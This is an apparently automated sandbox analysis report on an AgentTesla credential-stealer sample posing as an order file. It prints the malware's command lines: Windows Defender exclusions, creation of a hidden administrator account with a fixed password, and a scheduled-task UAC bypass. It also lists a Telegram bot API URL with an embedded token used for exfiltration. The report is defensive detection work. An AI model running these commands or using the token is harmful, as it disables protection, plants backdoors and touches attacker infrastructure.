
Windows Analysis Report #NEW ORDER FOR JANUARY 2022.exe

Overview

General Information

Sample Name: #NEW ORDER FOR JANUARY 2022.exe
Analysis ID: 553020
MD5: 8b974d65bf7e334d75f57027821ac628
SHA1: f3ccc2d15a771715e6653d470f955f7095e3cd17
SHA256: c2628acd6b807facd37a0b0db1068f80fa2c87702d6a687445a9ec1dc3bc2421
Tags: agenttesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected UAC Bypass using CMSTP
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Creates an autostart registry key pointing to binary in C:\Windows
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Contains functionality to hide user accounts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Adds a new user with administrator rights
Injects a PE file into a foreign processes
Sigma detected: Powershell Defender Exclusion
.NET source code contains very large array initializations
Sigma detected: Hurricane Panda Activity
Adds a directory exclusion to Windows Defender
Creates autostart registry keys with suspicious names
Drops executables to the windows directory (C:\Windows) and starts them
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Sigma detected: Net.exe User Account Creation
Drops PE files to the windows directory (C:\Windows)
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • #NEW ORDER FOR JANUARY 2022.exe (PID: 6588 cmdline: "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" MD5: 8B974D65BF7E334D75F57027821AC628)
    • powershell.exe (PID: 6684 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • net.exe (PID: 3604 cmdline: "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add MD5: DD0561156F62BC1958CE0E370B23711B)
      • conhost.exe (PID: 4780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • net1.exe (PID: 5692 cmdline: C:\Windows\system32\net1 user ADMIN~1 SECRET@1234 /add MD5: B5A26C2BF17222E86B91D26F1247AF3E)
        • conhost.exe (PID: 5568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • net.exe (PID: 5664 cmdline: "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add MD5: DD0561156F62BC1958CE0E370B23711B)
      • conhost.exe (PID: 5956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • net1.exe (PID: 5344 cmdline: C:\Windows\system32\net1 localgroup administrators ADMIN~1 /add MD5: B5A26C2BF17222E86B91D26F1247AF3E)
    • net.exe (PID: 6868 cmdline: "C:\Windows\system32\net.exe" localgroup users "user" /add MD5: DD0561156F62BC1958CE0E370B23711B)
      • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • net1.exe (PID: 4864 cmdline: C:\Windows\system32\net1 localgroup users "user" /add MD5: B5A26C2BF17222E86B91D26F1247AF3E)
    • net.exe (PID: 6908 cmdline: "C:\Windows\system32\net.exe" localgroup administrators "user" /del MD5: DD0561156F62BC1958CE0E370B23711B)
      • conhost.exe (PID: 2628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • net1.exe (PID: 7040 cmdline: C:\Windows\system32\net1 localgroup administrators "user" /del MD5: B5A26C2BF17222E86B91D26F1247AF3E)
    • schtasks.exe (PID: 6240 cmdline: "C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • conhost.exe (PID: 7112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 7056 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 7060 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1472 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ComSvcConfig.exe (PID: 4564 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe MD5: 2778AE0EB674B74FF8028BF4E51F1DF5)
    • aspnet_regbrowsers.exe (PID: 7068 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe MD5: B490A24A9328FD89155F075FA26C0DEC)
  • svchost.exe (PID: 7136 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4876 cmdline: "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" MD5: 8B974D65BF7E334D75F57027821AC628)
    • powershell.exe (PID: 6008 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • aspnet_regbrowsers.exe (PID: 4588 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe MD5: B490A24A9328FD89155F075FA26C0DEC)
  • svchost.exe (PID: 1004 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6712 cmdline: "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" MD5: 8B974D65BF7E334D75F57027821AC628)
    • powershell.exe (PID: 6996 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • AddInProcess32.exe (PID: 5200 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
    • ilasm.exe (PID: 6684 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe MD5: 432EAF71554C788169F9E8258BB9FF60)
    • AddInProcess32.exe (PID: 6748 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
  • #NEW ORDER FOR JANUARY 2022.exe (PID: 5684 cmdline: "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" MD5: 8B974D65BF7E334D75F57027821AC628)
    • powershell.exe (PID: 6240 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • jsc.exe (PID: 6512 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe MD5: 2B40A449D6034F41771A460DADD53A60)
  • svchost.exe (PID: 6916 cmdline: "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" MD5: 8B974D65BF7E334D75F57027821AC628)
    • powershell.exe (PID: 1424 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • CasPol.exe (PID: 5344 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
  • svchost.exe (PID: 6728 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6852 cmdline: "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" MD5: 8B974D65BF7E334D75F57027821AC628)
    • powershell.exe (PID: 5692 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • RegSvcs.exe (PID: 4204 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • svchost.exe (PID: 6728 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000003B.00000000.888165359.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0000003B.00000000.888165359.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
0000001F.00000000.710933564.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0000001F.00000000.710933564.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
(5 of 156 entries shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.#NEW ORDER FOR JANUARY 2022.exe.42c5920.2.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0.2.#NEW ORDER FOR JANUARY 2022.exe.42c5920.2.raw.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
32.2.svchost.exe.470db20.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
32.2.svchost.exe.470db20.2.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
31.0.aspnet_regbrowsers.exe.400000.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
(5 of 73 entries shown)

Sigma Overview

System Summary:

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Source: Process started; Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard; Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" , ParentImage: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe, ParentProcessId: 6852, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 4204
Sigma detected: Powershell Defender Exclusion
Source: Process started; Author: Florian Roth; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" , ParentImage: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe, ParentProcessId: 6588, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force, ProcessId: 6684
Sigma detected: Hurricane Panda Activity
Source: Process started; Author: Florian Roth; Data: Command: "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add, CommandLine: "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" , ParentImage: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe, ParentProcessId: 6588, ProcessCommandLine: "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add, ProcessId: 5664
Sigma detected: Net.exe User Account Creation
Source: Process started; Author: Endgame, JHasenbusch (adapted to Sigma for oscd.community); Data: Command: "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add, CommandLine: "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" , ParentImage: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe, ParentProcessId: 6588, ProcessCommandLine: "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add, ProcessId: 3604
Sigma detected: Net.exe Execution
Source: Process started; Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements); Data: Command: "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add, CommandLine: "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" , ParentImage: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe, ParentProcessId: 6588, ProcessCommandLine: "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add, ProcessId: 3604
Sigma detected: Possible Applocker Bypass
Source: Process started; Author: juju4; Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" , ParentImage: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe, ParentProcessId: 6852, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 4204
Sigma detected: Group Modification Logging
Source: Event Logs; Author: Alexandr Yampolskyi, SOC Prime; Data: EventID: 4728, Source: Microsoft-Windows-Security-Auditing, data 0: -, data 1: S-1-5-21-3853321935-2125563209-4053062332-1003, data 2: None, data 3: computer, data 4: S-1-5-21-3853321935-2125563209-4053062332-513, data 5: S-1-5-21-3853321935-2125563209-4053062332-1002, data 6: user, data 7: computer, data 8: 0x2005f, data 9: -
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" , ParentImage: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe, ParentProcessId: 6588, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force, ProcessId: 6684
Sigma detected: T1086 PowerShell Execution
Source: Pipe created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: PipeName: \PSHost.132866083503977576.6684.DefaultAppDomain.powershell

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: #NEW ORDER FOR JANUARY 2022.exe; ReversingLabs: Detection: 18%
Multi AV Scanner detection for dropped file
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe; ReversingLabs: Detection: 18%
Source: 37.2.aspnet_regbrowsers.exe.400000.0.unpack; Avira: Label: TR/Spy.Gen8
Source: 31.0.aspnet_regbrowsers.exe.400000.4.unpack; Avira: Label: TR/Spy.Gen8
Source: 31.0.aspnet_regbrowsers.exe.400000.1.unpack; Avira: Label: TR/Spy.Gen8
Source: 31.0.aspnet_regbrowsers.exe.400000.0.unpack; Avira: Label: TR/Spy.Gen8
Source: 37.0.aspnet_regbrowsers.exe.400000.2.unpack; Avira: Label: TR/Spy.Gen8
Source: 31.0.aspnet_regbrowsers.exe.400000.2.unpack; Avira: Label: TR/Spy.Gen8
Source: 37.0.aspnet_regbrowsers.exe.400000.3.unpack; Avira: Label: TR/Spy.Gen8
Source: 31.0.aspnet_regbrowsers.exe.400000.3.unpack; Avira: Label: TR/Spy.Gen8
Source: 31.2.aspnet_regbrowsers.exe.400000.0.unpack; Avira: Label: TR/Spy.Gen8
Source: 37.0.aspnet_regbrowsers.exe.400000.1.unpack; Avira: Label: TR/Spy.Gen8
Source: 37.0.aspnet_regbrowsers.exe.400000.4.unpack; Avira: Label: TR/Spy.Gen8
Source: 37.0.aspnet_regbrowsers.exe.400000.0.unpack; Avira: Label: TR/Spy.Gen8

Exploits:

Yara detected UAC Bypass using CMSTP
Source: Yara match; File source: 32.2.svchost.exe.5f89510.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.5a90000.7.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.5a90000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 36.2.svchost.exe.6330000.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 32.2.svchost.exe.5f70000.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 32.2.svchost.exe.5f70000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 36.2.svchost.exe.6349510.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.5aa9510.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 36.2.svchost.exe.6330000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4416ba0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4305940.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000026.00000003.795978697.0000000005A52000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000030.00000002.929093994.0000000006280000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000030.00000002.927387694.00000000049D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.737999019.0000000005A90000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000030.00000003.850266618.0000000006E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000024.00000002.850912152.0000000006330000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000020.00000002.786901859.0000000005F70000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000029.00000003.814234215.0000000006432000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000029.00000002.920418875.0000000005C10000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000024.00000003.756169106.0000000006B42000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000029.00000002.916893319.0000000004381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000029.00000002.911408277.000000000413D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000020.00000003.735522789.00000000067C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000026.00000002.871462494.00000000038F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.706917679.00000000062D2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000030.00000002.927142303.000000000478D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000026.00000002.895927015.0000000005330000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: #NEW ORDER FOR JANUARY 2022.exe PID: 6588, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: svchost.exe PID: 4876, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: svchost.exe PID: 6712, type: MEMORYSTR
Source: #NEW ORDER FOR JANUARY 2022.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: #NEW ORDER FOR JANUARY 2022.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: Binary string: aspnet_regbrowsers.pdbp source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.730764637.00000000036ED000.00000004.00000001.sdmp
Source: Binary string: aspnet_regbrowsers.pdbp??? |?_CorExeMainmscoree.dll?% @ source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.779987071.000000000474D000.00000004.00000001.sdmp
Source: Binary string: ???Oy??.pdbError: CoCreateInstance(IID_ISymUnmanagedWriter) returns %X source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp
Source: Binary string: ComSvcConfig.pdb?x source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp
Source: Binary string: aspnet_regbrowsers.pdb source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.730764637.00000000036ED000.00000004.00000001.sdmp
Source: Binary string: ilasm.pdb source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp
Source: Binary string: E:\A\_work\940\s\obj\Editor\IntellisenseDef\Release\net472\Microsoft.VisualStudio.Language.Intellisense.pdb source: svchost.exe, svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp
Source: Binary string: ComSvcConfig.pdb source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp

Networking:

Uses the Telegram API (likely for C&C communication)
Source: unknown; DNS query: name: api.telegram.org
Source: aspnet_regbrowsers.exe, 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp; String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp; String found in binary or memory: http://DynDns.comDynDNS
Source: aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp; String found in binary or memory: http://YsLVkm.com
Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.723973005.0000000003251000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.759358172.00000000033E1000.00000004.00000001.sdmp, svchost.exe, 00000024.00000002.804585113.00000000037A1000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp; String found in binary or memory: http://tempuri.org/
Source: aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp; String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmp; String found in binary or memory: https://api.telegram.org/bot2030557675:AAF2CRvHF_rfT7tYXz9VN8YUb6kF5qxu_xg/
